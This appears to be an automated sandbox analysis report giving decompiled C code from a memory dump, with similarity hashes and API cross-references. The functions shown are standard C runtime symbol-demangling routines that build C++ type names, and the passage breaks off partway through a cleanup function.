Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3211817929-1320211309
Opcode ID: df350d21080aadf0d674536ab45cb1704e298f9328da998077824d44135d2c80
Instruction ID: e2e251d0092b41ab63efa29da64d552dfa307e5599438af0abecbb34423550e7
Opcode Fuzzy Hash: df350d21080aadf0d674536ab45cb1704e298f9328da998077824d44135d2c80
Instruction Fuzzy Hash: 5C61E6B1D042099FDF01CFD4D554BEEBBBEAF19310F20441AD622A7280EB3599C5DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1229, Relevance: 15.3, APIs: 10, Instructions: 338
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B1229(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				intOrPtr* _t134;
				signed int* _t136;
				signed char _t141;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				signed int* _t159;
				signed int* _t160;
				signed int _t161;
				signed char _t180;
				signed int _t181;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				void* _t197;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				signed char _t210;
				signed char _t211;
				signed int _t221;
				intOrPtr _t226;
				intOrPtr* _t228;
				signed int _t229;
				void* _t232;
				signed int _t234;
				void* _t244;

				_t134 =  *0x6e221b68; // 0x0
				_t211 =  *_t134;
				if(_t211 == 0) {
					E6E1AFB49(_t211, _a4, 1, _a8);
					L93:
					_t136 = _a4;
					L94:
					return _t136;
				}
				_v16 = _v16 & 0x00000000;
				_t3 = _t134 + 1; // 0x1
				_t228 = _t3;
				_v12 = _v12 & 0x00000000;
				_t203 = _t211 & 0x000000ff;
				 *0x6e221b68 = _t228;
				_t232 = 2;
				_t244 = _t203 - 0x4e;
				if(_t244 > 0) {
					__eflags = _t203 - 0x4f;
					if(__eflags == 0) {
						_v32 = "long ";
						_v28 = 5;
						E6E1AFA1C( &_v16,  &_v32);
						L79:
						_v32 = "double";
						_t213 =  &_v16;
						_v28 = 6;
						E6E1AFC2F( &_v16,  &_v32);
						L80:
						_t141 = 0;
						_t204 = _t203 - 0x43;
						if(_t204 == 0) {
							_v32 = "signed ";
							_v28 = 7;
							L88:
							_t213 = E6E1AF764( &_v24,  &_v32);
							E6E1AFB8D(_t143,  &_v32,  &_v16);
							_v16 = _v32;
							_v12 = _v28;
							L89:
							_t147 = _a8;
							if( *_a8 != 0) {
								E6E1AFC87( &_v16, E6E1AFB1E(_t213,  &_v32, 0x20, _t147));
							}
							_t136 = _a4;
							 *_t136 = _v16;
							_t136[1] = _v12;
							goto L94;
						}
						_t205 = _t204 - _t232;
						if(_t205 == 0) {
							L33:
							_v32 = "unsigned ";
							_v28 = 9;
							goto L88;
						}
						_t206 = _t205 - _t232;
						if(_t206 == 0) {
							goto L33;
						}
						_t207 = _t206 - _t232;
						if(_t207 == 0) {
							goto L33;
						}
						_t208 = _t207 - _t232;
						if(_t208 == 0) {
							goto L33;
						}
						if(_t208 != 0x14) {
							goto L89;
						}
						L28:
						_t152 = (_t141 & 0x000000ff) - 0x45;
						if(_t152 == 0) {
							goto L33;
						}
						_t153 = _t152 - _t232;
						if(_t153 == 0) {
							goto L33;
						}
						_t154 = _t153 - _t232;
						if(_t154 == 0) {
							goto L33;
						}
						_t155 = _t154 - _t232;
						if(_t155 == 0 || _t155 == _t232) {
							goto L33;
						} else {
							goto L89;
						}
					}
					if(__eflags <= 0) {
						L76:
						 *0x6e221b68 = _t228 - 1;
						_t159 = E6E1B246E( &_v32);
						_t213 =  *_t159;
						_t229 = _t159[1];
						_v16 = _t213;
						_v12 = _t229;
						__eflags = _t213;
						if(_t213 != 0) {
							goto L80;
						}
						L59:
						_t136 = _a4;
						 *_t136 = _t213;
						_t136[1] = _t229;
						goto L94;
					}
					__eflags = _t203 - 0x53;
					if(_t203 <= 0x53) {
						_t210 = _t203 & 0x00000003;
						__eflags = _t210;
						L65:
						_t160 = _a8;
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t160;
						_t161 = _t160[1];
						_v32 = _t221;
						_v28 = _t161;
						__eflags = _t210 - 0xfffffffe;
						if(_t210 != 0xfffffffe) {
							__eflags = _t221;
							if(_t221 == 0) {
								_t234 = _t210 & 0x00000002;
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = "volatile";
										_v20 = 8;
										E6E1AFA1C( &_v16,  &_v24);
									}
								} else {
									_v24 = "const";
									_v20 = 5;
									E6E1AFA1C( &_v16,  &_v24);
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = " volatile";
										_v20 = 9;
										E6E1AFC2F( &_v16,  &_v24);
									}
								}
							}
							E6E1B3A75(_t210, _a4,  &_v16,  &_v32, 1);
							goto L93;
						}
						_v28 = _t161 | 0x00000800;
						E6E1B3A75(_t210,  &_v24,  &_v16,  &_v32, 0);
						_t229 = _v20;
						__eflags = 0x00000800 & _t229;
						if((0x00000800 & _t229) == 0) {
							_v32 = 0x6e1f2c0c;
							_v28 = 2;
							E6E1AFC2F( &_v24,  &_v32);
							_t229 = _v20;
						}
						_t213 = _v24;
						goto L59;
					}
					__eflags = _t203 - 0x58;
					if(_t203 == 0x58) {
						_v32 = "void";
						_v28 = 4;
						L12:
						_t213 =  &_v16;
						E6E1AFA1C( &_v16,  &_v32);
						goto L89;
					}
					__eflags = _t203 - 0x5f;
					if(_t203 != 0x5f) {
						goto L76;
					}
					_t180 =  *_t228;
					_t23 = _t228 + 1; // 0x2
					_t226 = _t23;
					_v5 = _t180;
					_t181 = _t180 & 0x000000ff;
					 *0x6e221b68 = _t226;
					__eflags = _t181 - 0x4e;
					if(__eflags > 0) {
						__eflags = _t181 - 0x53;
						if(__eflags > 0) {
							__eflags = _t181 - 0x55;
							if(_t181 == 0x55) {
								_v32 = "char32_t";
								L42:
								_v28 = 8;
								L26:
								_t213 =  &_v16;
								E6E1AFA1C( &_v16,  &_v32);
								L27:
								_t141 = _v5;
								goto L28;
							}
							__eflags = _t181 - 0x57;
							if(_t181 == 0x57) {
								_v32 = "wchar_t";
								L37:
								_v28 = 7;
								goto L26;
							}
							__eflags = _t181 + 0xffffffa8 - 1;
							if(_t181 + 0xffffffa8 > 1) {
								L60:
								_v32 = "UNKNOWN";
								goto L37;
							}
							_t51 = _t226 - 1; // 0x1
							 *0x6e221b68 = _t51;
							_t187 = E6E1B246E( &_v32);
							_t213 =  *_t187;
							_t229 = _t187[1];
							_v16 = _t213;
							_v12 = _t229;
							__eflags = _t213;
							if(_t213 != 0) {
								goto L27;
							}
							goto L59;
						}
						if(__eflags == 0) {
							_v32 = "char16_t";
							goto L42;
						}
						_t188 = _t181 - 0x4f;
						__eflags = _t188;
						if(_t188 == 0) {
							_t210 = 0xfffffffe;
							goto L65;
						}
						_t189 = _t188 - _t232;
						__eflags = _t189;
						if(_t189 == 0) {
							_v32 = "char8_t";
							goto L37;
						}
						__eflags = _t189 != 1;
						if(_t189 != 1) {
							goto L60;
						}
						_v32 = "<unknown>";
						_v28 = 9;
						goto L26;
					}
					if(__eflags == 0) {
						_v32 = "bool";
						_v28 = 4;
						goto L26;
					}
					__eflags = _t181 - 0x47;
					if(_t181 > 0x47) {
						__eflags = _t181 - 0x49;
						if(_t181 <= 0x49) {
							_v32 = "__int32";
							goto L37;
						}
						__eflags = _t181 - 0x4b;
						if(_t181 <= 0x4b) {
							_v32 = "__int64";
							goto L37;
						}
						__eflags = _t181 - 0x4d;
						if(_t181 > 0x4d) {
							goto L60;
						}
						_v32 = "__int128";
						goto L42;
					}
					__eflags = _t181 - 0x46;
					if(_t181 >= 0x46) {
						_v32 = "__int16";
						goto L37;
					}
					__eflags = _t181;
					if(_t181 == 0) {
						_t213 =  &_v16;
						 *0x6e221b68 = _t228;
						E6E1AFA80( &_v16, 1);
						goto L27;
					}
					__eflags = _t181 - 0x24;
					if(_t181 == 0x24) {
						_v32 = "__w64 ";
						_v28 = 6;
						E6E1AFAFC(_t226, _a4,  &_v32, E6E1B1229( &_v24, _a8));
						goto L93;
					}
					__eflags = _t181 + 0xffffffbc - 1;
					if(_t181 + 0xffffffbc > 1) {
						goto L60;
					} else {
						_v32 = "__int8";
						_v28 = 6;
						goto L26;
					}
				}
				if(_t244 == 0) {
					goto L79;
				}
				_t6 = _t203 - 0x43; // -67
				_t197 = _t6;
				if(_t197 > 0xa) {
					goto L76;
				}
				_t7 = _t197 + 0x6e1b1711; // 0x8bffffe5
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6E1B16F9))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t213 =  &_v16;
						E6E1AFA1C( &_v16,  &_v32);
						goto L80;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						goto L76;
				}
			}

0x6e1b122c
0x6e1b1234
0x6e1b123a
0x6e1b16e9
0x6e1b16f1
0x6e1b16f1
0x6e1b16f4
0x6e1b16f7
0x6e1b16f7
0x6e1b1240
0x6e1b1244
0x6e1b1244
0x6e1b1247
0x6e1b124b
0x6e1b124e
0x6e1b1256
0x6e1b1257
0x6e1b125a
0x6e1b12e7
0x6e1b12ea
0x6e1b161a
0x6e1b1625
0x6e1b162c
0x6e1b1631
0x6e1b1634
0x6e1b163c
0x6e1b163f
0x6e1b1646
0x6e1b164b
0x6e1b164b
0x6e1b164d
0x6e1b1650
0x6e1b167c
0x6e1b1683
0x6e1b168a
0x6e1b169e
0x6e1b16a0
0x6e1b16a8
0x6e1b16ae
0x6e1b16b1
0x6e1b16b1
0x6e1b16b7
0x6e1b16cc
0x6e1b16cc
0x6e1b16d1
0x6e1b16d7
0x6e1b16dc
0x00000000
0x6e1b16dc
0x6e1b1652
0x6e1b1654
0x6e1b1395
0x6e1b1395
0x6e1b139c
0x00000000
0x6e1b139c
0x6e1b165a
0x6e1b165c
0x00000000
0x00000000
0x6e1b1662
0x6e1b1664
0x00000000
0x00000000
0x6e1b166a
0x6e1b166c
0x00000000
0x00000000
0x6e1b1675
0x00000000
0x00000000
0x6e1b1379
0x6e1b137c
0x6e1b137f
0x00000000
0x00000000
0x6e1b1381
0x6e1b1383
0x00000000
0x00000000
0x6e1b1385
0x6e1b1387
0x00000000
0x00000000
0x6e1b1389
0x6e1b138b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1b138b
0x6e1b12f0
0x6e1b15f1
0x6e1b15f4
0x6e1b15fd
0x6e1b1603
0x6e1b1605
0x6e1b1608
0x6e1b160b
0x6e1b160e
0x6e1b1610
0x00000000
0x00000000
0x6e1b14c3
0x6e1b14c3
0x6e1b14c6
0x6e1b14c8
0x00000000
0x6e1b14c8
0x6e1b12f6
0x6e1b12f9
0x6e1b1507
0x6e1b1507
0x6e1b150a
0x6e1b150a
0x6e1b150d
0x6e1b1511
0x6e1b1515
0x6e1b1517
0x6e1b151a
0x6e1b151d
0x6e1b1520
0x6e1b1523
0x6e1b1571
0x6e1b1573
0x6e1b1577
0x6e1b157a
0x6e1b157d
0x6e1b15b9
0x6e1b15bb
0x6e1b15c0
0x6e1b15cb
0x6e1b15d2
0x6e1b15d2
0x6e1b157f
0x6e1b1582
0x6e1b158d
0x6e1b1594
0x6e1b1599
0x6e1b159b
0x6e1b15a0
0x6e1b15ab
0x6e1b15b2
0x6e1b15b2
0x6e1b159b
0x6e1b157d
0x6e1b15e4
0x00000000
0x6e1b15e9
0x6e1b152c
0x6e1b153d
0x6e1b1542
0x6e1b1548
0x6e1b154a
0x6e1b154f
0x6e1b155a
0x6e1b1561
0x6e1b1566
0x6e1b1566
0x6e1b1569
0x00000000
0x6e1b1569
0x6e1b12ff
0x6e1b1302
0x6e1b14f4
0x6e1b14fb
0x6e1b12d6
0x6e1b12da
0x6e1b12dd
0x00000000
0x6e1b12dd
0x6e1b1308
0x6e1b130b
0x00000000
0x00000000
0x6e1b1311
0x6e1b1313
0x6e1b1313
0x6e1b1316
0x6e1b1319
0x6e1b131c
0x6e1b1322
0x6e1b1325
0x6e1b1447
0x6e1b144a
0x6e1b148c
0x6e1b148f
0x6e1b14e8
0x6e1b1416
0x6e1b1416
0x6e1b136a
0x6e1b136e
0x6e1b1371
0x6e1b1376
0x6e1b1376
0x00000000
0x6e1b1376
0x6e1b1491
0x6e1b1494
0x6e1b14dc
0x6e1b13f0
0x6e1b13f0
0x00000000
0x6e1b13f0
0x6e1b1499
0x6e1b149c
0x6e1b14d0
0x6e1b14d0
0x00000000
0x6e1b14d0
0x6e1b149e
0x6e1b14a1
0x6e1b14aa
0x6e1b14b0
0x6e1b14b2
0x6e1b14b5
0x6e1b14b8
0x6e1b14bb
0x6e1b14bd
0x00000000
0x00000000
0x00000000
0x6e1b14bd
0x6e1b144c
0x6e1b1483
0x00000000
0x6e1b1483
0x6e1b144e
0x6e1b144e
0x6e1b1451
0x6e1b147d
0x00000000
0x6e1b147d
0x6e1b1453
0x6e1b1453
0x6e1b1455
0x6e1b146f
0x00000000
0x6e1b146f
0x6e1b1457
0x6e1b145a
0x00000000
0x00000000
0x6e1b145c
0x6e1b1463
0x00000000
0x6e1b1463
0x6e1b132b
0x6e1b1434
0x6e1b143b
0x00000000
0x6e1b143b
0x6e1b1331
0x6e1b1334
0x6e1b13fc
0x6e1b13ff
0x6e1b142b
0x00000000
0x6e1b142b
0x6e1b1401
0x6e1b1404
0x6e1b1422
0x00000000
0x6e1b1422
0x6e1b1406
0x6e1b1409
0x00000000
0x00000000
0x6e1b140f
0x00000000
0x6e1b140f
0x6e1b133a
0x6e1b133d
0x6e1b13e9
0x00000000
0x6e1b13e9
0x6e1b1343
0x6e1b1345
0x6e1b13d9
0x6e1b13dc
0x6e1b13e2
0x00000000
0x6e1b13e2
0x6e1b134b
0x6e1b134e
0x6e1b13ae
0x6e1b13b6
0x6e1b13ca
0x00000000
0x6e1b13cf
0x6e1b1353
0x6e1b1356
0x00000000
0x6e1b135c
0x6e1b135c
0x6e1b1363
0x00000000
0x6e1b1363
0x6e1b1356
0x6e1b1260
0x00000000
0x00000000
0x6e1b1266
0x6e1b1266
0x6e1b126c
0x00000000
0x00000000
0x6e1b1272
0x6e1b1279
0x00000000
0x6e1b1280
0x00000000
0x00000000
0x6e1b129f
0x6e1b12a6
0x00000000
0x00000000
0x6e1b12af
0x6e1b12b6
0x00000000
0x00000000
0x6e1b12bf
0x6e1b1287
0x6e1b1287
0x6e1b128e
0x6e1b1292
0x6e1b1295
0x00000000
0x00000000
0x6e1b12c8
0x6e1b12cf
0x00000000
0x00000000
0x00000000
0x00000000

APIs

shared_ptr.LIBCMT ref: 6E1B1295
shared_ptr.LIBCMT ref: 6E1B12DD
shared_ptr.LIBCMT ref: 6E1B1371
operator+.LIBVCRUNTIME ref: 6E1B13CA
DName::operator=.LIBVCRUNTIME ref: 6E1B13E2
shared_ptr.LIBCMT ref: 6E1B162C
DName::operator+.LIBCMT ref: 6E1B16A0
operator+.LIBVCRUNTIME ref: 6E1B16E9

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: d6cbf2a7c6ce8aaa1ae2147d07505719c97c1cde3c4fafd4892b4626040f9dba
Instruction ID: 948867a118c20ac08525a954c312c7243323aea5492c70bcaa965ebe1787836f
Opcode Fuzzy Hash: d6cbf2a7c6ce8aaa1ae2147d07505719c97c1cde3c4fafd4892b4626040f9dba
Instruction Fuzzy Hash: B8D160B1E0420ADECF01CFD5C494BEEBBB8AB15314F22815AD521AB251D77486CAEFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B47EC, Relevance: 15.3, APIs: 10, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1B47EC(void* __ebx, void* __edx, void* __edi, void* __esi, signed int* _a4) {
				signed int _v8;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				void* __ebp;
				signed int _t62;
				intOrPtr* _t64;
				char* _t65;
				signed int _t73;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				signed int _t126;
				signed int _t128;
				signed int* _t167;
				signed int _t169;
				signed int _t170;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				void* _t180;

				_t165 = __edx;
				_t62 =  *0x6e21801c; // 0xd8901f95
				_v8 = _t62 ^ _t177;
				_t64 =  *0x6e221b68; // 0x0
				_t126 =  *_t64;
				_t65 = _t64 + 1;
				_t167 = _a4;
				_t169 = _t126;
				 *0x6e221b68 = _t65;
				_v28 = _t169;
				_t180 = _t126 - 0x45;
				if(_t180 > 0) {
					__eflags = _t126 - 0x52;
					if(__eflags > 0) {
						__eflags = _t126 - 0x53;
						if(_t126 == 0x53) {
							 *_t167 =  *_t167 & 0x00000000;
							_t59 =  &(_t167[1]);
							 *_t59 = _t167[1] & 0x00000000;
							__eflags =  *_t59;
							L53:
							return E6E1A93EA(_v8 ^ _t177);
						}
						__eflags = _t126 - 0x54 - 2;
						if(_t126 - 0x54 > 2) {
							L51:
							_t167[1] = _t167[1] & 0x00000000;
							 *_t167 =  *_t167 & 0x00000000;
							_t167[1] = 2;
							goto L53;
						}
						L38:
						E6E1B4197(_t165, _t167,  &_v40);
						E6E1B4226( &_v40,  &_v24, 0x10);
						_t73 = E6E1CF009( &_v40,  &_v24);
						__eflags =  *0x6e221b70 & 0x00004000;
						_t170 = _t73;
						if(( *0x6e221b70 & 0x00004000) == 0) {
							L42:
							E6E161238( &_v24, 0x10, "%d", _t170 & 0x00000fff);
							_v36 = 0;
							_push(_v36);
							E6E1AF511( &_v40,  &_v24);
							_t79 = _v28 - 0x52;
							__eflags = _t79;
							if(_t79 == 0) {
								L50:
								_v32 = "`template-type-parameter-";
								L49:
								_v28 = 0x19;
								L47:
								E6E1AFB8D(E6E1AF764( &_v48,  &_v32),  &_v32,  &_v40);
								_push(0x27);
								L35:
								_push(_t167);
								E6E1AFBAF( &_v32);
								goto L53;
							}
							_t85 = _t79;
							__eflags = _t85;
							if(_t85 == 0) {
								goto L50;
							}
							_t86 = _t85 - 1;
							__eflags = _t86;
							if(_t86 == 0) {
								_v32 = "`generic-class-parameter-";
								goto L49;
							}
							__eflags = _t86 != 1;
							if(_t86 != 1) {
								goto L51;
							}
							_v32 = "`generic-method-parameter-";
							_v28 = 0x1a;
							goto L47;
						}
						_t128 =  *0x6e221b78; // 0x0
						__eflags = _t128;
						if(_t128 == 0) {
							goto L42;
						}
						 *0x6e1ee1b4(_t73 & 0x00000fff);
						_t90 =  *_t128();
						__eflags = _t90;
						if(_t90 == 0) {
							goto L42;
						}
						_v36 = 0;
						_push(_v36);
						E6E1AF511(_t167, _t90);
						goto L53;
					}
					if(__eflags == 0) {
						goto L38;
					}
					__eflags = _t126 - 0x4a;
					if(_t126 <= 0x4a) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E6E1B0C7F( &_v32, 0x7b);
						_t129 = _t126 - 0x48;
						__eflags = _t126 - 0x48 - 2;
						if(_t126 - 0x48 <= 2) {
							_push( &_v40);
							E6E1AFC87( &_v32, E6E1B2085(_t129, _t167, _t169));
							E6E1AFCDE( &_v32, 0x2c);
						}
						_t172 = _t169 - 0x46;
						__eflags = _t172;
						if(_t172 == 0) {
							L32:
							E6E1AFC87( &_v32, E6E1B4197(_t165, _t167,  &_v40));
							E6E1AFCDE( &_v32, 0x2c);
							goto L33;
						} else {
							_t173 = _t172 - 1;
							__eflags = _t173;
							if(_t173 == 0) {
								L31:
								E6E1AFC87( &_v32, E6E1B4197(_t165, _t167,  &_v40));
								E6E1AFCDE( &_v32, 0x2c);
								goto L32;
							}
							_t174 = _t173 - 1;
							__eflags = _t174;
							if(_t174 == 0) {
								L33:
								E6E1AFC87( &_v32, E6E1B4197(_t165, _t167,  &_v40));
								L34:
								_push(0x7d);
								goto L35;
							}
							_t175 = _t174 - 1;
							__eflags = _t175;
							if(_t175 == 0) {
								goto L32;
							}
							__eflags = _t175 != 1;
							if(_t175 != 1) {
								goto L34;
							}
							goto L31;
						}
					}
					__eflags = _t126 - 0x4d;
					if(_t126 != 0x4d) {
						goto L51;
					}
					E6E1B4AFD(_t126, __edx, _t167, _t169,  &_v32);
					__eflags = _v28 - 1;
					if(_v28 > 1) {
						goto L51;
					}
					E6E1B47EC(_t126, __edx, _t167, _t169, _t167);
					L9:
					goto L53;
				}
				if(_t180 == 0) {
					_push(_t167);
					E6E1B2085(_t126, _t167, _t169);
					goto L9;
				}
				if(_t126 == 0) {
					 *0x6e221b68 = _t65 - 1;
					E6E1AF804(_t167, 1);
					goto L53;
				}
				if(_t126 == 0x30) {
					E6E1B4197(__edx, _t167, _t167);
					goto L9;
				}
				if(_t126 == 0x31) {
					__eflags =  *_t65 - 0x40;
					if( *_t65 != 0x40) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E6E1B0C7F( &_v32, 0x26);
						_push( &_v40);
						E6E1AFB8D( &_v32, _t167, E6E1B2085(_t126, _t167, _t169));
					} else {
						_v32 = "NULL";
						 *0x6e221b68 = _t65 + 1;
						_v28 = 4;
						E6E1AF764(_t167,  &_v32);
					}
					goto L53;
				}
				if(_t126 == 0x32) {
					E6E1B516A(_t126, __edx, _t167, _t169, _t167);
					goto L9;
				}
				if(_t126 == 0x34) {
					E6E1B4430(_t167, _t167);
					goto L9;
				}
				_t130 = _t126 - 0x41;
				if(_t126 - 0x41 > 1) {
					goto L51;
				}
				E6E1B2947(_t130, __edx, _t167, _t169, _t167, _t169);
				goto L9;
			}

0x6e1b47ec
0x6e1b47f2
0x6e1b47f9
0x6e1b47fc
0x6e1b4804
0x6e1b4806
0x6e1b4807
0x6e1b480a
0x6e1b480d
0x6e1b4812
0x6e1b4815
0x6e1b4818
0x6e1b48e9
0x6e1b48ec
0x6e1b49d2
0x6e1b49d5
0x6e1b4ae5
0x6e1b4ae8
0x6e1b4ae8
0x6e1b4ae8
0x6e1b4aec
0x6e1b4afc
0x6e1b4afc
0x6e1b49de
0x6e1b49e1
0x6e1b4ad8
0x6e1b4ad8
0x6e1b4adc
0x6e1b4adf
0x00000000
0x6e1b4adf
0x6e1b49e7
0x6e1b49eb
0x6e1b49fa
0x6e1b4a03
0x6e1b4a08
0x6e1b4a12
0x6e1b4a15
0x6e1b4a4a
0x6e1b4a5c
0x6e1b4a64
0x6e1b4a6e
0x6e1b4a72
0x6e1b4a7a
0x6e1b4a7a
0x6e1b4a7d
0x6e1b4acf
0x6e1b4acf
0x6e1b4ac6
0x6e1b4ac6
0x6e1b4a9d
0x6e1b4ab3
0x6e1b4ab8
0x6e1b49c4
0x6e1b49c4
0x6e1b49c8
0x00000000
0x6e1b49c8
0x6e1b4a80
0x6e1b4a80
0x6e1b4a83
0x00000000
0x00000000
0x6e1b4a85
0x6e1b4a85
0x6e1b4a88
0x6e1b4abf
0x00000000
0x6e1b4abf
0x6e1b4a8a
0x6e1b4a8d
0x00000000
0x00000000
0x6e1b4a8f
0x6e1b4a96
0x00000000
0x6e1b4a96
0x6e1b4a17
0x6e1b4a1d
0x6e1b4a1f
0x00000000
0x00000000
0x6e1b4a29
0x6e1b4a2f
0x6e1b4a32
0x6e1b4a34
0x00000000
0x00000000
0x6e1b4a36
0x6e1b4a3c
0x6e1b4a40
0x00000000
0x6e1b4a40
0x6e1b48f2
0x00000000
0x00000000
0x6e1b48f8
0x6e1b48fb
0x6e1b4925
0x6e1b492c
0x6e1b4932
0x6e1b4937
0x6e1b493a
0x6e1b493d
0x6e1b4942
0x6e1b494d
0x6e1b4957
0x6e1b4957
0x6e1b495c
0x6e1b495c
0x6e1b495f
0x6e1b4992
0x6e1b49a0
0x6e1b49aa
0x00000000
0x6e1b4961
0x6e1b4961
0x6e1b4961
0x6e1b4964
0x6e1b4975
0x6e1b4983
0x6e1b498d
0x00000000
0x6e1b498d
0x6e1b4966
0x6e1b4966
0x6e1b4969
0x6e1b49af
0x6e1b49bd
0x6e1b49c2
0x6e1b49c2
0x00000000
0x6e1b49c2
0x6e1b496b
0x6e1b496b
0x6e1b496e
0x00000000
0x00000000
0x6e1b4970
0x6e1b4973
0x00000000
0x00000000
0x00000000
0x6e1b4973
0x6e1b495f
0x6e1b48fd
0x6e1b4900
0x00000000
0x00000000
0x6e1b490a
0x6e1b490f
0x6e1b4914
0x00000000
0x00000000
0x6e1b491b
0x6e1b4858
0x00000000
0x6e1b4858
0x6e1b481e
0x6e1b48de
0x6e1b48df
0x00000000
0x6e1b48df
0x6e1b4826
0x6e1b48cf
0x6e1b48d4
0x00000000
0x6e1b48d4
0x6e1b482f
0x6e1b48c3
0x00000000
0x6e1b48c3
0x6e1b4838
0x6e1b486e
0x6e1b4871
0x6e1b4897
0x6e1b489e
0x6e1b48a4
0x6e1b48ac
0x6e1b48b8
0x6e1b4873
0x6e1b4874
0x6e1b487b
0x6e1b4885
0x6e1b488d
0x6e1b488d
0x00000000
0x6e1b4871
0x6e1b483d
0x6e1b4867
0x00000000
0x6e1b4867
0x6e1b4842
0x6e1b485f
0x00000000
0x6e1b485f
0x6e1b4844
0x6e1b484a
0x00000000
0x00000000
0x6e1b4852
0x00000000

APIs

DName::operator+.LIBCMT ref: 6E1B48B8
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B48C3
DName::DName.LIBVCRUNTIME ref: 6E1B48D4
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B4979
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B4996
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B49B3
DName::operator+.LIBCMT ref: 6E1B49C8
UnDecorator::getSignedDimension.LIBCMT ref: 6E1B49EB
_swprintf.LIBCMT ref: 6E1B4A5C
DName::operator+.LIBCMT ref: 6E1B4AB3

Part of subcall function 6E1B2947: DName::DName.LIBVCRUNTIME ref: 6E1B296B

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
String ID:
API String ID: 138750261-0
Opcode ID: ad96ea7a986781982c2ef9c7d3792cbe6b5b8feb310c12f7bf08938647b4dc0e
Instruction ID: cfcc20ad873df9deb541bd50b5dfb96d00311531374e0e93010c5e8979a89314
Opcode Fuzzy Hash: ad96ea7a986781982c2ef9c7d3792cbe6b5b8feb310c12f7bf08938647b4dc0e
Instruction Fuzzy Hash: 7881C376D4024A9EEF10CBF5C855BFE777CAF19304F20851AD122A2080FB7959CAE7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF4B7, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E1CF4B7(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x6e1f4e30;
				if(_t67 != 0x6e1f4e30) {
					E6E1D1BE4(_t67);
					_t36 = _a4;
				}
				E6E1D1BE4( *((intOrPtr*)(_t36 + 0x3c)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x30)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x34)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x38)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x28)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x2c)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x40)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x44)));
				E6E1D1BE4( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E1CF1D4(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
